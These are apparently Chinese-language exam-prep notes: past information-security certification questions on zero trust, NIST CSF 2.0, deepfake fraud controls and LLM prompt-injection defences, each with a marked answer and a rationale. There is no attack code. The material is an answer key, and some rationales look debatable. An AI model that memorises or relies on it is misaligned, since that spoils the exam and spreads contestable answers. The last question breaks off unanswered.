限制可存取的知識庫 - Prompt 過濾（防 Prompt Injection） --- > **Q：** 【題組 2】情境如附圖所示。在導入影像辨識、聲音辨識或 AI 模組，為了確保導入系統的可信任性（Trustworthiness），應考量下列哪些項目？（複選） > > **情境**：近年來，人工智慧的應用有效的協助企業組織完成許多艱難的任務，節省大量的人力。然而，結合深度偽造技術（Deepfake）的語音與影像攻擊，使詐騙效果更高。攻擊者可精準模仿組織高層的聲音或影像，誘使受害者放下警戒、依指示行動，導致重大資安風險與營運損失。企業高層要求身為資安長的您規劃一系列的強化機制，以避免組織同仁受騙將公司的款項匯出造成組織的營運損失。 > > 資安部門據此推動以下控制措施： > (1) 阻擋存取深度偽造工具或相關不良內容網站的使用。 > (2) 企業導入影像辨識、聲音辨識或 AI 模組，增加深度偽造攻擊的防禦能力。 > (3) 教育員工辨識深度偽造攻擊（如假冒上司語音指令、影像假訊息等）。 > (4) 財務與會計系統導入多因子認證（Multi-Factor Authentication, MFA），以降低匯款人員身份遭到盜用。 > (5) 電子郵件系統強化安全性，導入電子郵件系統的資料儲存加密技術。 > (6) 加強職務區隔（Segregation of Duties, SoD）：超過一定金額的匯款額度需要經過主管複核同意後始得匯款。 > (7) 採用專有視訊會議系統導入多因子認證，封鎖非公司認可的專有視訊會議系統開會。 > > - \(A\) AI 強韌度（AI Robustness） > - \(B\) AI 可靠度（AI Reliability） > - \(C\) AI 可控性（AI Controllability） > - \(D\) AI 系統速度（AI System Speed） <details> <summary>查看答案</summary> **\(A\)\(C\)** AI 可信任性（Trustworthiness）核心考量： - A 對：強韌度（Robustness）— 對抗惡意攻擊或異常輸入的能力 - C 對：可控性（Controllability）— 人類對 AI 系統的控制能力 - B 錯：可靠度偏向系統穩定性，非可信任性核心 - D 錯：系統速度是效能問題，與可信任性無關 </details> --- ### 114 年考題補充 > **Q：** 2023 年發現某國際知名汽車大廠於將近 10 年期間，將超過 200 萬輛車子位置資訊公開在網路上，車上攝影機拍攝的影像也曝險了將近 7 年。經其內部分析，事件主要原因在於對員工的資料處理政策說明不夠徹底，導致雲端環境錯誤設定所致。請問下列何項措施，最「不」能防止類似事件再次發生？ > - \(A\) 強化員工教育訓練 > - \(B\) 定訂更明確之雲端資安政策 > - \(C\) 執行雲端弱點掃描 > - \(D\) 備份雲端環境設定 <details> <summary>查看答案</summary> **\(D\) 備份雲端環境設定** 根因是「員工不清楚政策 → 設定錯誤」，備份是事後復原用，無法預防錯誤設定發生。 </details> --- > **Q：** 請問下列對於資訊安全管理實務的描述何者較「不」正確？ > - \(A\) 縱深防禦（Defense in Depth）指在整實體、系統、網路或網宇（Cyberspace）中建置了多層的防禦機制 > - \(B\) 零信任架構（ZTA）已成為國內主流，目前國內企業組織的資訊及工控系統都已廣為採用零信任架構 > - \(C\) 僅知原則（Need-to-Know Principle）與最小權限原則（Principle of Least Privilege，POLP）仍然是可供參考的資安管理實務原則 > - \(D\) 職務區隔（Separation of Duties，SoD）也是管理層面的安全機制，也可以透過技術層面來加強使得工作分成多人分層負責避免個人進行非授權的工作或提升偵測的能力 <details> <summary>查看答案</summary> **\(B\) 零信任架構（ZTA）已成為國內主流...** ZTA 目前仍在推廣階段，國內企業尚未「廣為採用」，尤其是工控系統（OT）導入更慢。 </details> --- > **Q：** 【題組 2】情境如附圖所示，NIST CSF 於近年來已經成為世界各國使用率最高的資安框架，2024 年 3 月 NIST 公佈了最新版的 2.0 版，其功能自原有的 5 個主功能，擴增成為 6 大主要功能，原有的維度為一個維護的防護流程，新的管理功能加強了原有的 5 個功能外，也使 CSF 更具有效率的方式將寶貴且有限的資源做最佳的投注。在 2.0 版新增的功能，於發佈的資料中稱之為下列何項？ > > **情境**：在準備上市公司的董事會會議中，資通安全是議程的重點。此次會議主要討論如何加強公司的資通安全防護及管理機制、應對生成式 AI 的威脅，以及了解最新的資安框架更新如何融入公司治理之中。資通安全主管向董事會介紹了我國上市上櫃公司資通安全控管指引，強調該指引要求設置專責人員負責訂定資通安全政策及目標。其中一位董事成員提出了生成式 AI 在攻擊中的利用，指出生成式 AI 已成為攻擊者的利器之一，資通安全主管解釋了這一技術的戰術進程，並強調公司需要強化對此類威脅的防護措施。在外部議題討論時外部顧問提到美國國家標準技術研究院（NIST）創建的網路安全框架（Cyber Security Framework，CSF）在 2024 年 3 月公佈了最新的 2.0 版，資通安全主管提到其 CSF 改版的差別，將功能從原有的 5 個主要功能擴增為 6 大主要功能。新的管理功能不僅加強了原有的 5 個功能，還使 CSF 在資源配置上更具效率，最終管理部門，針對市櫃公司引導中的人員教育訓練應落實至公司的每一位成員，並且應有其核核的制度，確保教育訓練的有效性。身為資通安全主管的你，應該如何面對這些議題。 > > - \(A\) 識別（Identify） > - \(B\) 響應（Respond） > - \(C\) 治理（Govern） > - \(D\) 復原（Recover） <details> <summary>查看答案</summary> **\(C\) 治理（Govern）** NIST CSF 2.0 由原本 5 大功能擴增為 6 大功能，新增的是 Govern（治理）。 </details> --- > **Q：** 關於 NIST SP 800-207 零信任架構（Zero Trust Architecture）中的網路敘述，下列何項錯誤？ > - \(A\) 企業內部網路不可視為隱式信任區（Implicit Trust Zone） > - \(B\) 內部網路中的設備可能非企業所有或受企業管控 > - \(C\) 遠距企業人員可完全信任他們本地的網路連線 > - \(D\) 資產與流程於企業和非企業之基礎設施移動時，必須為一致的安全標準 <details> <summary>查看答案</summary> **\(C\) 遠距企業人員可完全信任他們本地的網路連線** ZTA 核心是「永不信任」，任何網路連線都不可完全信任，包括遠距人員的本地網路。 </details> --- > **Q：** 關於設計供應鏈遠端存取架構的敘述，下列何項最「不」適切？ > - \(A\) 身份識別應該要有多重身份驗證機制（MFA） > - \(B\) 可以透過虛擬私人網路（Virtual Private Network，VPN）做存取控制 > - \(C\) 使用資料外洩防護（Data Loss Prevention，DLP）即可做到個人資料保護 > - \(D\) 可以透過傳輸加密保護營業秘密 <details> <summary>查看答案</summary> **\(C\) 使用資料外洩防護（Data Loss Prevention，DLP）即可做到個人資料保護** DLP 是防止資料外洩的工具，但個資保護需要多層措施（存取控制、加密、政策等），單靠 DLP「即可」做到是錯的。 </details> --- > **Q：** 【題組 4】情境如附圖所示。關於規劃零信任資安架構的敘述，下列何者有誤？ > > **情境**：2020 年美國國家標準技術研究院（NIST）正式頒布標準文件 SP800-207：零信任架構（Zero Trust Architecture，ZTA），零信任已從概念探討階段進入實務部署規劃。 > >  > > 陳生為跨國企業之資安管理人員，因應供應鏈上下游要求，包含遠端使用供應鏈管理系統、資料存取、設備辨識等項目規劃零信任架構。因此他參考了國際 NIST 標準文件 SP800-207 後，開始進行規劃，以下是他遇到的問題，請協助他完成這個安全架構規劃任務。 > > - \(A\) 白名單之非法遠端連線（RDP）是零信任在網路層的控制項目之一 > - \(B\) 只要設定白名單就可以完全符合零信任之需求 > - \(C\) 資安微隔離（Micro-Segmentation）是零信任在網路層的控制項目之一 > - \(D\) 資料存取的零信任可以透過防治資料外洩（DLP）方案落實 <details> <summary>查看答案</summary> **\(B\) 只要設定白名單就可以完全符合零信任之需求** 零信任需要五大支柱的多層次控制，不是單一白名單就能「完全符合」。 </details> --- > **Q：** 【題組 4】情境如附圖所示。針對遠端使用供應鏈管理系統、資料存取、設備辨識等項目規劃零信任架構。在設計資安架構時，「不」包含下列何項原則？ > > **情境**：2020 年美國國家標準技術研究院（NIST）正式頒布標準文件 SP800-207：零信任架構（Zero Trust Architecture，ZTA），零信任已從概念探討階段進入實務部署規劃。 > >  > > 陳生為跨國企業之資安管理人員，因應供應鏈上下游要求，包含遠端使用供應鏈管理系統、資料存取、設備辨識等項目規劃零信任架構。因此他參考了國際 NIST 標準文件 SP800-207 後，開始進行規劃，以下是他遇到的問題，請協助他完成這個安全架構規劃任務。 > > - \(A\) 資產採購 > - \(B\) 元件關係 > - \(C\) 工作流程規劃 > - \(D\) 存取政策 <details> <summary>查看答案</summary> **\(A\) 資產採購** 判斷技巧：題目問的是「架構設計原則」，B、C、D 都跟系統架構規劃有關，只有「資產採購」是行政採買作業，明顯不屬於架構設計範疇。 </details> --- > **Q：** 【題組 4】情境如附圖所示。CISA（美國網路安全暨基礎設施安全局）零信任成熟度模型（Zero Trust Maturity Model，ZTMM），針對遠端使用供應鏈管理系統、資料存取、設備辨識等項目規劃零信任架構。關於設計與部署原則的敘述，下列何者最正確？ > > **情境**：2020 年美國國家標準技術研究院（NIST）正式頒布標準文件 SP800-207：零信任架構（Zero Trust Architecture，ZTA），零信任已從概念探討階段進入實務部署規劃。 > >  > > 陳生為跨國企業之資安管理人員，因應供應鏈上下游要求，包含遠端使用供應鏈管理系統、資料存取、設備辨識等項目規劃零信任架構。因此他參考了國際 NIST 標準文件 SP800-207 後，開始進行規劃，以下是他遇到的問題，請協助他完成這個安全架構規劃任務。 > > - \(A\) 員工自帶裝置可以不算在零信任架構中 > - \(B\) 雲端資料來源與運算服務，不納入零信任架構 > - \(C\) 所有的資料來源與運算服務，都要被當作是資源 > - \(D\) 在允許存取之前，所有的資源的身分鑑別與授權機制，不需監控結果動態決定 <details> <summary>查看答案</summary> **\(C\) 所有的資料來源與運算服務，都要被當作是資源** ZTA 核心原則： - 所有資源（含 BYOD、雲端）都須納入保護範圍 - 存取決策須「持續驗證」並「動態決定」 A、B 錯在「排除」某些資源；D 錯在「不需動態決定」。 </details> --- > **Q：** 【題組 4】情境如附圖所示。關於 NIST SP 800-207 零信任架構（Zero Trust Architecture）的基本規則敘述，下列何者正確？（複選） > > **情境**：2020 年美國國家標準技術研究院（NIST）正式頒布標準文件 SP800-207：零信任架構（Zero Trust Architecture，ZTA），零信任已從概念探討階段進入實務部署規劃。 > >  > > 陳生為跨國企業之資安管理人員，因應供應鏈上下游要求，包含遠端使用供應鏈管理系統、資料存取、設備辨識等項目規劃零信任架構。因此他參考了國際 NIST 標準文件 SP800-207 後，開始進行規劃，以下是他遇到的問題，請協助他完成這個安全架構規劃任務。 > > - \(A\) 所有的通訊都需被保護，無論其所在之網路位置 > - \(B\) 須觀察與量測所擁有資產與相關資產，其完整性與安全態勢 > - \(C\) 運算服務（Computing Service）和資料來源（Data Sources）皆可視為資源 > - \(D\) 應先蒐集資產、網路架構等現狀，建立資產清冊 <details> <summary>查看答案</summary> **\(A\)\(B\)\(C\)** - A 對：ZTA 核心 —「所有通訊都需保護，不因位置而信任」 - B 對：ZTA 核心 —「持續監控資產完整性與安全態勢」 - C 對：ZTA 核心 —「所有資料來源與運算服務都視為資源」 - D 錯：建立資產清冊是好做法，但屬於「實施步驟」，不是 ZTA 的「基本規則」 </details> --- > **Q：** 【題組 5】情境如附圖所示，在美國國家標準暨技術研究院（NIST）訂定的軟體開發安全框架（Secure Software Development Framework，SSDF）中提到第三方元件弱點的風險管控，下列達成風險管控的方式何者錯誤？ > > **情境**：各產業對於軟體供應鏈安全的韌性要求，包含供應鏈上下游的公司資訊安全、軟體安全等。在風險管理方面可以透過參考或導入 ISO 系統以達到有效的管控。 > > - \(A\) 盤點各系統使用的第三方元件清單 > - \(B\) 清查第三方元件的弱點 > - \(C\) 持續監控第三方元件弱點情資 > - \(D\) 使用較不知名的第三方元件 <details> <summary>查看答案</summary> **\(D\) 使用較不知名的第三方元件** A、B、C 都是正確的風險管控方式（對應 SBOM、SCA）。「較不知名」的元件反而風險更高，因為社群支援少、弱點修補慢、安全性難以驗證。 </details> --- > **Q：** 【題組 5】情境如附圖所示，下列何者「不」是正確的軟體風險管理控制方法？ > > **情境**：各產業對於軟體供應鏈安全的韌性要求，包含供應鏈上下游的公司資訊安全、軟體安全等。在風險管理方面可以透過參考或導入 ISO 系統以達到有效的管控。 > > - \(A\) 第三方元件弱點管理 > - \(B\) 於合約中載明軟體開發之資安修補責任 > - \(C\) 定期巡檢軟體弱點與更新 > - \(D\) 透過第三方軟體庫進行更新 <details> <summary>查看答案</summary> **\(D\) 透過第三方軟體庫進行更新** 透過「非官方」的第三方軟體庫更新，可能引入惡意套件或遭竄改的版本，反而增加供應鏈風險。應從官方或可信任來源更新。 </details> --- > **Q：** 【題組 5】情境如附圖所示，在軟體供應鏈中的風險管理上，有以下哪些方式進行資安預防及檢測？（複選） > > **情境**：各產業對於軟體供應鏈安全的韌性要求，包含供應鏈上下游的公司資訊安全、軟體安全等。在風險管理方面可以透過參考或導入 ISO 系統以達到有效的管控。 > > - \(A\) 軟體物料清單（Software Bill of Materials，SBOM） > - \(B\) 原始碼檢測及防毒掃描 > - \(C\) IAS-99 > - \(D\) SEMI 197 <details> <summary>查看答案</summary> **\(A\)\(B\)** - A 對：SBOM 用於盤點第三方元件，追蹤弱點 - B 對：原始碼檢測（SAST）、防毒掃描都是預防檢測手段 - C 錯：IAS-99 是工控系統（ICS）安全標準 - D 錯：SEMI 197 是半導體設備資安標準 </details> --- > **Q：** 金管會於 2024 年 7 月發布《金融業導入零信任架構參考指引》，將導入措施分為四級（Level I-IV）。若在資源存取時，將「時間、地點、設備合規狀態」等動態屬性納入授權審核條件，並可對異常樣態進行動態撤銷、限縮存取或即時告警，請問該作法屬於下列哪一級的資安管控措施？ > - \(A\) 第一級 靜態指標 > - \(B\) 第二級 融入動態指標 > - \(C\) 第三級 以即時指標為主 > - \(D\) 第四級 最佳化整合指標 <details> <summary>查看答案</summary> **\(B\) 第二級 融入動態指標** 將時間、地點、設備合規狀態等「動態屬性」納入授權條件，屬於第二級。 </details> --- > **Q：** 【題組 1】情境如附圖所示。身為該醫療中心的資安長（CISO），為有效控制損害並避免攻擊者在混合雲環境內部橫向移動，下列何種安全架構規劃原則在此情境下最能發揮作用？ > > **情境**：一家被政府依《資通安全管理法》核定為「關鍵基礎設施提供者（Critical Infrastructure Provider）」的區域醫療中心，其資訊環境為混合雲架構。院內核心的「電子病歷系統（EHR）」部署於本地資料中心，而新推出的「遠距醫療諮詢平台」則採用雲端原生技術，並整合了第三方開發的預約排程模組。為提升效率，開發團隊被允許在配發的公務筆電上，使用生成式 AI 輔助開發。某日上午，資安監控中心（SOC）的 AI 驅動偵測系統發出警報，顯示 EHR 主機出現勒索軟體加密行為，同時發現攻擊源頭來自一台開發人員的筆電，該筆電因執行了含有惡意程式碼的 AI 輔助工具而遭入侵。 > > - \(A\) 強化邊界防火牆規則，嚴格過濾所有進出醫院網路的流量 > - \(B\) 導入零信任安全架構（Zero Trust Architecture, ZTA），在內網實施微切分（Micro-segmentation） > - \(C\) 要求所有員工每三十天更換一次高強度密碼，並進行資安教育訓練 > - \(D\) 集中所有伺服器日誌至本地的資安訊息與事件管理系統（SIEM）進行分析 <details> <summary>查看答案</summary> **\(B\) 導入零信任安全架構（Zero Trust Architecture, ZTA），在內網實施微切分（Micro-segmentation）** 防止「橫向移動」的關鍵是微隔離，將內網切分成多個區段，即使一台被入侵也無法輕易擴散到其他系統。 </details> --- > **Q：** 關於零信任架構（ZTA）的描述，下列何者較「不」正確？ > - \(A\) 相當適用於防禦內部攻擊或受到入侵後的橫向移動 > - \(B\) 存取資源時由政策執行點（Policy Enforcement Point, PEP）向政策決策點（Policy Decision Point, PDP）詢問是否應該允許存取資源 > - \(C\) 詳細的 ZTA 架構說明描述於 NIST SP800-217 中 > - \(D\) 端對端的加密通訊使得零信任架構的部署更具挑戰 <details> <summary>查看答案</summary> **\(C\) 詳細的 ZTA 架構說明描述於 NIST SP800-217 中** ZTA 標準文件是 **NIST SP 800-207**，不是 SP800-217。題目故意用錯誤編號當陷阱。 </details> --- > **Q：** 一間跨國製造企業正在評估如何處理量子運算（Quantum Computing）對其現有資料加密儲存構成的長期風險。該企業儲存的設計圖與專利資料需保密數十年。考量到未來「先擷取後解密（Harvest Now, Decrypt Later）」的威脅，下列何種風險處理策略在當前最具前瞻性與成本效益考量？ > - \(A\) 立即將所有加密系統升級為領導廠商宣稱的「抗量子」專有演算法 > - \(B\) 採取風險接受策略，認定量子運算在資料生命週期內不會成熟 > - \(C\) 啟動混合加密模式，同時使用傳統加密演算法與標準化的後量子密碼學（Post-Quantum Cryptography, PQC）演算法 > - \(D\) 將風險完全轉移，僅透過購買網路安全保險來應對未來可能的資料洩露 <details> <summary>查看答案</summary> **\(C\) 啟動混合加密模式，同時使用傳統加密演算法與標準化的後量子密碼學（Post-Quantum Cryptography, PQC）演算法** - A 錯：「專有演算法」未經驗證，風險高 - B 錯：資料需保密數十年，量子運算可能在期限內成熟 - C 對：混合模式兼顧現有相容性與未來抗量子能力 - D 錯：保險是轉移財務損失，無法防止資料洩露 </details> --- > **Q：** 【題組 2】情境如附圖所示。資安長要求除了前述控制外，為了強化 AI 治理，導入 ISO 42001 人工智慧管理系統（Artificial Intelligence Management System, AIMS），請問在導入 AIMS 過程中，下列何項組合與 AI 治理較具關聯？ > > **情境**：近年來，人工智慧的應用有效的協助企業組織完成許多艱難的任務，節省大量的人力。然而，結合深度偽造技術（Deepfake）的語音與影像攻擊，使詐騙效果更高。攻擊者可精準模仿組織高層的聲音或影像，誘使受害者放下警戒、依指示行動，導致重大資安風險與營運損失。企業高層要求身為資安長的您規劃一系列的強化機制，以避免組織同仁受騙將公司的款項匯出造成組織的營運損失。 > > 資安部門據此推動以下控制措施： > (1) 阻擋存取深度偽造工具或相關不良內容網站的使用。 > (2) 企業導入影像辨識、聲音辨識或 AI 模組，增加深度偽造攻擊的防禦能力。 > (3) 教育員工辨識深度偽造攻擊（如假冒上司語音指令、影像假訊息等）。 > (4) 財務與會計系統導入多因子認證（Multi-Factor Authentication, MFA），以降低匯款人員身份遭到盜用。 > (5) 電子郵件系統強化安全性，導入電子郵件系統的資料儲存加密技術。 > (6) 加強職務區隔（Segregation of Duties, SoD）：超過一定金額的匯款額度需要經過主管複核同意後始得匯款。 > (7) 採用專有視訊會議系統導入多因子認證，封鎖非公司認可的專有視訊會議系統開會。 > > - \(A\) (1)(5) > - \(B\) (2)(3) > - \(C\) (3)(4) > - \(D\) (5)(6) <details> <summary>查看答案</summary> **\(B\) (2)(3)** - (2) 導入 AI 模組（影像/聲音辨識）→ AI 技術應用 - (3) 教育員工辨識 AI 相關攻擊 → AI 意識訓練 ISO 42001 是 AI 管理系統標準，重點是 AI 技術的導入與治理，其他選項（MFA、郵件加密、SOD）與 AI 治理無直接關聯。 </details> --- > **Q：** 由於企業對於大型語言模型（LLM）的使用需求大增，企業內的程式開發與研發團隊使用前述技術的雲端服務也日益頻繁，諸如 ChatGPT 及 Copilot 等等，然而為了避免公司機密資料外洩，高階管理階層要求加強對於程式開發與研發團隊使用雲端大型語言模型服務加強控制，請問下列做法何者較「不」適切？ > - \(A\) 強化微分段架構安全 > - \(B\) 強化 WEB 應用層防火牆的安全政策，尤其是程式片段的上傳 > - \(C\) 清查 LLM 的使用情形，限制非核可 LLM 服務的使用 > - \(D\) 加強雲端 API 連結使用的確認與管理 <details> <summary>查看答案</summary> **\(A\) 強化微分段架構安全** 微分段是網路層面的隔離控制，跟防止 LLM 資料外洩關係不大。其他選項（WAF 限制上傳、清查 LLM 使用、API 管理）都直接針對 LLM 使用情境。 </details> --- > **Q：** 參考美國國家標準研究院（NIST）與 ISO/IEC 62443 相關規範，營運技術（Operational Technology, OT）網路環境，包含製造業、醫療業等，在設計上的原則下列何者最為適切？ > - \(A\) 要區隔資訊環境及作業環境 > - \(B\) 可以透過主機型防火牆做區隔 > - \(C\) 可以共用同一台目錄服務跟檔案伺服器 > - \(D\) OT 環境比較封閉可以不用更新軟體弱點 <details> <summary>查看答案</summary> **\(A\) 要區隔資訊環境及作業環境** - A 對：IT/OT 區隔是核心原則，防止攻擊從 IT 擴散到 OT - B 錯：主機型防火牆不足以做環境區隔，需要網路層級隔離 - C 錯：共用基礎設施違反區隔原則，增加攻擊面 - D 錯：OT 環境封閉不代表安全，仍須更新修補弱點（如 Stuxnet 案例） </details> --- > **Q：** 某智慧製造工廠計畫導入零信任安全架構（Zero Trust Architecture, ZTA）以保護其營運技術（Operational Technology, OT）網路。相較於傳統的資訊技術（Information Technology, IT）環境，在 OT 場域中實施 ZTA 時，面臨的最大挑戰通常是什麼？ > - \(A\) 使用者身分多元，難以統一管理 > - \(B\) 缺乏足夠的網路頻寬來處理持續的驗證請求 > - \(C\) 大量老舊的工業控制系統（ICS）與設備不支援現代化的身分驗證協定 > - \(D\) OT 環境中的資料流量過於龐大，難以進行深度封包檢測（Deep Packet Inspection, DPI） <details> <summary>查看答案</summary> **\(C\) 大量老舊的工業控制系統（ICS）與設備不支援現代化的身分驗證協定** OT 環境的設備生命週期長（10-20 年），老舊 ICS 無法支援 MFA、SAML 等現代驗證協定，是導入 ZTA 的最大障礙。 </details> --- > **Q：** 【題組 3】情境如附圖所示。因關稅考量，公司決定於美國增設一生產基地，以提高商品的競爭力，原營業據點將遷移至生產基地，相關業務人員採遠端辦公，下列何者措施有助於公司集中控管資訊系統同時可以符合遠端辦公的需求？ > > **情境**：某上市公司因覺得國內市場飽和，同時考量降低生產成本，以求增加其產品的競爭力與組織獲利，故公司國內於南部設有公司總部，並於附近有一生產基地，另於東南亞 V 國有一生產基地，並於美國及歐洲有營業據點，以擴展公司的業務。 > > - \(A\) 導入精簡用戶端配合虛擬桌面基礎架構（VDI） > - \(B\) 導入零信任架構（ZTA） > - \(C\) 在所有筆電啟用 BitLocker 全磁碟加密 > - \(D\) 宣導員工使用私人電腦進行遠端連線 <details> <summary>查看答案</summary> **\(A\) 導入精簡用戶端配合虛擬桌面基礎架構（VDI）** - A 對：VDI 將桌面環境集中於資料中心，端點只是顯示畫面，資料不落地，便於集中控管 - B 錯：ZTA 是安全架構，但不是「集中控管資訊系統」的直接解法 - C 錯：BitLocker 保護本機資料，但資料仍散落各端點，非集中控管 - D 錯：私人電腦難以管控，違反資安原則 </details> --- > **Q：** 【題組 3】情境如附圖所示。歐洲地區的業務人員多採遠距辦公，由公司配發筆記型電腦供員工使用，主要採用 Windows 10 作業系統，請問下列哪些措施最能降低公司機密外流的風險？（複選） > > **情境**：某上市公司因覺得國內市場飽和，同時考量降低生產成本，以求增加其產品的競爭力與組織獲利，故公司國內於南部設有公司總部，並於附近有一生產基地，另於東南亞 V 國有一生產基地，並於美國及歐洲有營業據點，以擴展公司的業務。 > > - \(A\) 為員工提供虛擬私人網路（VPN）以加密存取內部資源 > - \(B\) 啟用 BitLocker 磁碟加密功能 > - \(C\) 作業系統禁止使用無線區域網路 > - \(D\) 導入精簡用戶端配合雲端桌面 <details> <summary>查看答案</summary> **\(A\)\(B\)\(D\)** - A 對：VPN 加密傳輸，防止中間人竊取 - B 對：BitLocker 全磁碟加密，筆電遺失時保護資料 - C 錯：禁用無線網路過於極端，不切實際 - D 對：雲端桌面資料不落地，降低外流風險 </details> --- > **Q：** 在零信任（Zero Trust）安全架構下，考慮到網路微分割（Network Micro-Segmentation）的實施，下列何項描述最準確地闡述了它與其他零信任安全控制措施（如身份和存取管理、加密和持續監控）的交互作用？ > - \(A\) 網路微分割獨立於其他零信任控制措施運作，不與身份和存取管理或加密策略互動 > - \(B\) 身份和存取管理策略在網路微分割實施之前是不必要的，因為微分割本身就足以防範網路入侵 > - \(C\) 網路微分割與身份和存取管理緊密結合，確保只有驗證和授權的用戶才能存取特定網路段，同時加密和持續監控提供額外的安全層 > - \(D\) 持續監控在網路微分割實施過程中不起作用，因為微分割旨在隔離和控制網路流量，而不是監控 <details> <summary>查看答案</summary> **\(C\) 網路微分割與身份和存取管理緊密結合，確保只有驗證和授權的用戶才能存取特定網路段，同時加密和持續監控提供額外的安全層** 零信任架構強調各控制措施「協同運作」： - 微分割 + 身份存取管理：確保只有授權用戶存取特定網段 - 加密：保護傳輸中的資料 - 持續監控：偵測異常行為 單一措施無法獨立完成零信任目標。 </details> --- > **Q：** 下列何項是美國國家標準技術研究院（NIST）的網路安全框架（Cyber Security Framework，CSF）從版本 1.1 更新到 2.0 中最明顯的改變？ > - \(A\) 增加了新的五大功能類別，分別為辨識（Identify）、保護（Protect）、偵測（Detect）、回應（Respond）、復原（Recover） > - \(B\) 引入「治理（Govern）」作為第六個核心功能 > - \(C\) 簡化了所有類別的定義以提升易用性 > - \(D\) 擴展了對雲端安全的具體指導內容 <details> <summary>查看答案</summary> **\(B\) 引入「治理（Govern）」作為第六個核心功能** - A 錯：五大功能是 1.0/1.1 就有的，不是 2.0 新增 - B 對：CSF 2.0 最大改變是新增 Govern（治理）作為第六個核心功能 - C 錯：2.0 沒有「簡化」定義 - D 錯：雲端安全不是 2.0 的主要改變 </details> --- > **Q：** 在使用 NIST SP 800-207 Zero Trust Architecture 架構中的進階身份治理（Enhanced Identity Governance）模式時，請問下列哪些要素會影響最終信任評等的結果計算？（複選） > - \(A\) 資產狀態（Asset Status） > - \(B\) 密碼長度（Password Length） > - \(C\) 資源內容（Enterprise Resource） > - \(D\) 環境因素（Environmental Factors） <details> <summary>查看答案</summary> **\(A\)\(C\)\(D\)** - A 對：資產狀態（設備合規性、健康狀態）影響信任評等 - B 錯：密碼長度是密碼政策，不是動態信任評等的輸入 - C 對：存取的資源類型與敏感度影響信任決策 - D 對：環境因素（時間、地點、網路位置）影響信任評等 </details> --- > **Q：** 關鍵基礎設施與製造業常有據點分佈全球之狀況，因此須考量遠距情況下的實體安全差異，是否對運營科技（Operational Technology，OT）的運作能力或安全性造成風險。關於運營科技的安全維運敘述，下列何者最為適切？（複選） > - \(A\) 據點間的通信應使用點對點加密與身份驗證，無論專線、衛星或網際網路等形式 > - \(B\) 各據點確保有足夠的網路頻寬，來收集與傳輸監控資料與運營資料 > - \(C\) 各據點皆須建立必要的網絡安全防護措施，以降低來自網路攻擊威脅與危害 > - \(D\) 各據點不應採用委外管理模式的資通安全威脅偵測管理（Security Operation Center，SOC）機制 <details> <summary>查看答案</summary> **\(A\)\(B\)\(C\)** - A 對：遠距通信應加密與身份驗證 - B 對：確保頻寬以傳輸監控資料 - C 對：各據點建立網路安全防護 - D 錯：SOC **可以**採用委外管理模式，許多企業使用 MSSP（Managed Security Service Provider） </details> --- > **Q：** 企業導入 AI 提升工作流程或修訂除錯，在各大知名企業都是顯學，而 AI 安全也因應而生。企業進行 AI 模型的安全性檢測時，為識別和修復可能的 AI 安全漏洞，下列何種措施較為適切？ > - \(A\) 僅對 AI 模型的訓練數據進行完整性檢查，而不進行模型行為分析 > - \(B\) 針對 AI 系統的 API 進行測試，以識別未經身份驗證的存取或過度暴露的功能 > - \(C\) 在滲透測試中，僅關注於傳統的網路基礎設施和主機漏洞，無需關注 AI 模型的特定風險 > - \(D\) 僅在模型上使用靜態分析工具來檢測程式碼中的潛在問題，而不測試實際攻擊途徑 <details> <summary>查看答案</summary> **\(B\) 針對 AI 系統的 API 進行測試，以識別未經身份驗證的存取或過度暴露的功能** - A 錯：「僅」檢查訓練數據不夠，還須分析模型行為（對應 Data Poisoning、Model Behavior） - B 對：API 安全測試可識別未授權存取、過度暴露功能（對應 LLM06 Excessive Agency） - C 錯：AI 有特定風險（Prompt Injection、Model Poisoning 等），不能只看傳統漏洞 - D 錯：「僅」靜態分析不夠，須測試實際攻擊途徑（如 Prompt Injection 實測） </details> --- > **Q：** 下列哪一種資訊安全框架特別強調治理（Govern）、識別（Identify）、保護（Protect）、偵測（Detect）、回應（Respond）與復原（Recover）六大面向？ > - \(A\) ISO 27001 > - \(B\) CIS CSC > - \(C\) NIST Cybersecurity Framework v2（CSF） > - \(D\) Zero Trust <details> <summary>查看答案</summary> **\(C\) NIST Cybersecurity Framework v2（CSF）** - A 錯：ISO 27001 是 ISMS 標準，控制項分為組織、人員、實體、技術四大主題 - B 錯：CIS CSC 是 CIS Controls，著重於具體控制措施 - C 對：NIST CSF 2.0 六大功能：**Govern（治理）**、Identify、Protect、Detect、Respond、Recover - D 錯：Zero Trust 是架構原則，核心是「永不信任，持續驗證」 > CSF 2.0 新增 Govern（治理）作為第六個核心功能，強調高層責任與資安納入整體風險管理 </details> --- > **Q：** 一家企業正計畫將大型語言模型（LLM）整合至其內部知識庫系統，以提供員工智慧問答服務。為了防範與生成式 AI 相關的安全風險，下列哪些是資安團隊應優先實施的控制措施？（複選） > - \(A\) 對使用者輸入的提示（Prompt）進行過濾與淨化，以防禦提示注入（Prompt Injection）攻擊 > - \(B\) 部署 Layer 4 網路防火牆（Network Firewall） > - \(C\) 建立嚴格的資料外洩防護（Data Loss Prevention, DLP）規則，監控並阻擋模型輸出中可能包含的敏感資訊 > - \(D\) 實施基於角色的存取控制（Role-Based Access Control, RBAC），確保僅有授權員工能存取特定主題的知識庫與模型互動 <details> <summary>查看答案</summary> **\(A\)\(C\)\(D\)** - A 對：Prompt 過濾 → 防止 Prompt Injection（對應 LLM01） - B 錯：Layer 4 防火牆無法偵測 LLM 特定攻擊，需應用層控制 - C 對：DLP → 防止敏感資訊外洩（對應 LLM02 Sensitive Information Disclosure） - D 對：RBAC → 限制可存取的知識庫（對應 LLM06 Excessive Agency） </details> --- > **Q：** 下列何項正確的描述了美國國家標準技術研究院（NIST）的網路安全框架（Cyber Security Framework, CSF）新增的「治理（Govern）」功能重點？（複選） > - \(A\) 明確高層管理在網路安全策略中的責任與決策角色 > - \(B\) 提供技術層面的具體指導來實施威脅緩解機制 > - \(C\) 強調將網路安全融入組織的整體風險管理框架中 > - \(D\) 引入自動化工具以簡化網路安全事件的回應流程 <details> <summary>查看答案</summary> **\(A\)\(C\)** - A 對：Govern 強調**高層責任**與決策角色 - B 錯：技術層面指導屬於 Protect、Detect 等其他功能 - C 對：Govern 強調**資安納入整體風險管理**框架 - D 錯：自動化回應屬於 Respond 功能，非 Govern > NIST CSF 2.0 Govern 核心：高層責任 + 資安納入整體風險管理 </details> --- > **Q：** Android 作業系統為提昇安全性，在專用硬體元件中提供下列何項生成/保護加密金鑰的機制？ > - \(A\) 共用偏好設定（Shared Preferences） > - \(B\) 內部儲存（Internal Storage） > - \(C\) 可信執行環境（Trusted Execution Environment, TEE） 